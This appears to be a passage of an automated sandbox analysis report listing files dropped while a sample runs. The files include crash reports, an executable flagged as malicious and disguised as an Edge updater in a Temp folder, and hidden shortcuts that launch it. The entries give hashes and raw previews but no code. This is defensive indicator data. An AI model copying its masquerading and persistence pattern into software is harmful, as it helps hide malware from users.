                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.8.4.<./.P.i.d.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4766
                Entropy (8bit):4.46373827857693
                Encrypted:false
                SSDEEP:48:cvIwWl8zsnJg77aI9EHWpW8VY2B0Ym8M4JzEO7F8+q8v1EOPBSEL6d:uIjfJI7C27VdnJo3KOCUq6d
                MD5:52B89849DFF39D21618C49C0D1D1178C
                SHA1:F0649C6FA787F8EE106234E737B46DC6516D4A06
                SHA-256:9CE64DA2B4007FF7F8BCEA6DD11B49A2AC39B65F85D85906EC46D40EB23310AA
                SHA-512:C5CCBFFE39BF2560B32CCE5A6DD15BEB77C0737A5E3EB49805BA1E360859708605472250102F9B84BB87952CD102468BAEA05B73E625E69023251ACB5D6A81FC
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:40 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):193644
                Entropy (8bit):4.105630127271952
                Encrypted:false
                SSDEEP:1536:7B+R5gfWweqCDN1ctTPSbM/CJ1k6peUG9BAuBojRppN4uE2aOmnyLTgdSVXDXpAw:lAFDhNYDlUG92V4uEqmnyLTgdyzjl
                MD5:4FAF2A6D474D8752BF7A755E54E597D4
                SHA1:66E70128D1212C830DB6CF601918F45B8AA6D52B
                SHA-256:9710EB96246D73811ED497D939A154EB653AD73A80AFD308AD6BA74188BD695A
                SHA-512:FA3B00B57C4B1A2A2536D7035A22BFACCB175084AA8DDAEE9E4B4277EAC2F9D56542E8411B5354EF72E25EE86DF189CFD69C1E7041627293354112FC89D982CD
                Malicious:false
                Preview:MDMP..a..... ..........f....................................$...........4!...:..........`.......8...........T............$..|.......................................................................................................eJ......8.......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8394
                Entropy (8bit):3.6912520085247182
                Encrypted:false
                SSDEEP:192:R6l7wVeJLS6Ec6Y2DUSUcgmfZbhnYprA89bdqsfAHfm:R6lXJe6f6YJSUcgmf1WdJfA+
                MD5:BA547BC5A618B84088B21CA964AD1213
                SHA1:949DF31C32213A2D7CD079B6477DCECA409CFB24
                SHA-256:1BA34930AED8EC99EB3927B1808A4D5AB7F09D21597859B84D27754F2DAD8652
                SHA-512:AA728D645EAF2520CEC9D9FF839932B78235ADD74E29456D85E9C13706FAECA45D61357146E1858C549A528D07650D3FFC8AE900BD4CF4E245DB7D9262764273
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.5.6.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4751
                Entropy (8bit):4.465408303643834
                Encrypted:false
                SSDEEP:48:cvIwWl8zsnJg77aI9EHWpW8VYaYm8M4JcgHEO7F3x+q8vCHEOQBb7EA7Vd:uIjfJI7C27VmJcgkqxKCkxV7T7Vd
                MD5:D1C1E15351A7CBF6CFD831AA6FE04C73
                SHA1:D1690E5DC87340450713DF5591F4962E4F974B11
                SHA-256:1EDBAD949ACA2BC42F343572587337C28B040A0C12A16464028916835332DCC2
                SHA-512:4BC915E61C8F821CCB46BA0E6B30168B8994A9A23E7A9463993916EE8B634A4C5279BBF8BD27392FAF300FD34888A308FA16AC1DFEEAC1698D8B9F9915185476
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:48 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):194480
                Entropy (8bit):4.096240485911788
                Encrypted:false
                SSDEEP:3072:tFrUquuEjgWkCEy4uEqRMKLTgy9yGMVE:tFrUqusWdEy4EMoTgy9yGM
                MD5:547D9FD69CB4BD9A7E14105A24F330E8
                SHA1:CF6E6C481C1AC6D9E8C6BDB565A07F34A72AA362
                SHA-256:215C41EC941CA74FC600F65CB8D2F926491DE916BCF520F6D56CAE70FFB33923
                SHA-512:01F720D89EA73E987EF58EA1EF8C1CCCF94EDE4ED87BE060C53667A1D6071B79E0A542CB26D064AE9BB8374A8C48B2EB15152896B4379814055E584A6CD5B0C0
                Malicious:false
                Preview:MDMP..a..... ..........f....................................$...........T!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8406
                Entropy (8bit):3.690275104557864
                Encrypted:false
                SSDEEP:192:R6l7wVeJ3m6Xve6Y2DwSUpgmfZkhnYprY89bV0sfgvHm:R6lXJ26G6YNSUpgmfmOVnfF
                MD5:0504D67A4A77DBE771BF43735C330C36
                SHA1:6F3E4BA084EA2220E1128CA4343A6C7190BE866E
                SHA-256:E335E98AE19B8A234F22612545F4B3D52BA5208BF7C987959A8180D19E720728
                SHA-512:23B0BFB317D4A0025B7D8ED3ED654E001F9702CC5D3ACE8C62FD6779322BBCC0DA9D862B8B0D30B5C1FE91093CC0FE4581CB6C15E3D1838F5976A003262D743B
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.8.0.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4766
                Entropy (8bit):4.463643359792613
                Encrypted:false
                SSDEEP:48:cvIwWl8zsnJg77aI9EHWpW8VYqYm8M4JzEO7Fz/J+q8v1EOKBSELmd:uIjfJI7C27VSJoK/JKOLUqmd
                MD5:7B68695974828638EC284EEFDBEDBDE8
                SHA1:592A96D90C125523A5E1A84584F028054C746F32
                SHA-256:A500580683FC9D6090C3586B3B6C856ACBAD1F940C9BECA5B36508142484BCDC
                SHA-512:2BFAD840E1C1860897B23BE9AADAC0780EA9A530468B79DED12F8F4AB7AFD1A674B34D2E40E2FA287521E12654A479B2CA01D9AD42E6A6426791137B90E0ABFC
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Users\user\Desktop\file.exe
                File Type:CSV text
                Category:modified
                Size (bytes):425
                Entropy (8bit):5.353683843266035
                Encrypted:false
                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                MD5:859802284B12C59DDBB85B0AC64C08F0
                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):243888
                Entropy (8bit):7.063657397171467
                Encrypted:false
                SSDEEP:3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
                MD5:F37E0267C53AE8E94FE38E87524B8C45
                SHA1:FACAA93A619AB87DA8AC448DD1FC71FB72E5380E
                SHA-256:3ECF0A5FDC66D37C9E726334A0E57D6DC1E3AB622653D032F8DB827185CC7C80
                SHA-512:9684C9D8B8C6995F889BE8E8A72E8340D12B32E85327C5B70892191F4510B32F374FC408AED1E37022326AF43F620D187ABFBC93F8F218488C65C3DD732DDB74
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 18%
                • Antivirus: Virustotal, Detection: 24%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`.................................D...(....................\...\... ..........8...........................................................0...H............text....T... ...................... ..`.wyi................................@...."Rv.....L.......N.................. ..`.rsrc................T..............@..@.reloc....... .......Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):243888
                Entropy (8bit):7.063657397171467
                Encrypted:false
                SSDEEP:3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
                MD5:F37E0267C53AE8E94FE38E87524B8C45
                SHA1:FACAA93A619AB87DA8AC448DD1FC71FB72E5380E
                SHA-256:3ECF0A5FDC66D37C9E726334A0E57D6DC1E3AB622653D032F8DB827185CC7C80
                SHA-512:9684C9D8B8C6995F889BE8E8A72E8340D12B32E85327C5B70892191F4510B32F374FC408AED1E37022326AF43F620D187ABFBC93F8F218488C65C3DD732DDB74
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 18%
                • Antivirus: Virustotal, Detection: 24%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`.................................D...(....................\...\... ..........8...........................................................0...H............text....T... ...................... ..`.wyi................................@...."Rv.....L.......N.................. ..`.rsrc................T..............@..@.reloc....... .......Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\file.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:33 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939386316228691
                Encrypted:false
                SSDEEP:24:82ARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8XJD3lfAvRAt41vgHyg
                MD5:890B5849DE940BF2A5B949693D4717F9
                SHA1:7C147AFC83E9C257E8308EC8F275794948CDA39C
                SHA-256:71EB298D08DB8A229F613B7F842F6D5879AF8A99C7C40765E179AFFE949DEC44
                SHA-512:190A15FDF8E46F14C45E5A6C8E2188343775E27A9A4349D324243985D03AFC8EE726A7B20B4C0EEBD977AD5A772EFC872B3BE032C5FF96E8350419ACA7AB296E
                Malicious:false
                Preview:L..................F....".....X:3.....!H3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:54 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.932768135121045
                Encrypted:false
                SSDEEP:24:8kRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8mJD3lfAvRAt41vgHyg
                MD5:BA201631B8037E8817EEE33C6C1CBA5E
                SHA1:CADF4B9A6EEDB1AE29B06CF0C625A811095102BD
                SHA-256:0CEFC4D3CB4B599DBFA753621DFFBFFF8B2F9700CB99FB10D8E5AF5E77123E45
                SHA-512:064D43516D782F84D178F9C63FE5472027C2F07D22F5A6185CECD14DF35D19F9465C19DC3C7D753884D8A9F136908C9449E1E9F37E85D4471D22B961546857C3
                Malicious:false
                Preview:L..................F....".....X:3...r.T3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:26 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938805545238883
                Encrypted:false
                SSDEEP:24:8dRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TJD3lfAvRAt41vgHyg
                MD5:2A19CF8A5B62A535E8EFBB94261A63DA
                SHA1:F13DCE1274BEB202BC3D04ADDD536A520D81A2D4
                SHA-256:1C3BAA497A9D79E422EDEF20ECBCC79063DC0DF713E572AA858EF50A6532E044
                SHA-512:F8213EAC61FCF8EF2E81B743B53591A16C450E3B4560F5FD7820CBE68E3919AA877BADDBD99F5960109BEF0D37745148B2098C1E1BD8DB232C9529E3E3313366
                Malicious:false
                Preview:L..................F....".....X:3...5.)D3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:52 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.933044243616138
                Encrypted:false
                SSDEEP:24:8zRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8VJD3lfAvRAt41vgHyg
                MD5:00C4DA46A8A67715900EB05D0795A74D
                SHA1:37E8BCE7230635F16BD83B3DC62C5152F576A5BE
                SHA-256:E3566090D6E60322E022425EACB5899C1A3480765716DD4E67B9192817F4AF4B
                SHA-512:48CC18645ED24400D8E34AFA5391AB2DBAD36E4E21BDCA8B2C6241FED41EAF3BC280D879971EDD26066C54DC5C4122B0B12A3F4F12DFDC4E216556FA208068DE
                Malicious:false
                Preview:L..................F....".....X:3....:kS3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9361445524285035
                Encrypted:false
                SSDEEP:24:8yRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:80JD3lfAvRAt41vgHyg
                MD5:0C1415ED3AD4436D6F0C41EE3E49BF9C
                SHA1:0DC05FCFC4332F98C01CBAF5D58D8C8A9AC2C059
                SHA-256:14BE9C4CDF3EA641D823FD97CB67A5FD2A1D22B3AE2DCFAB3E2723797A09D78A
                SHA-512:859F58E32295B27CF8F16484010F88BCA664F85C06B9A430F4CC9DD4AABEB63F4898C223BD3948E3CB7761E4F27865898737C61A9729B4557AE776F1AC2F485D
                Malicious:false
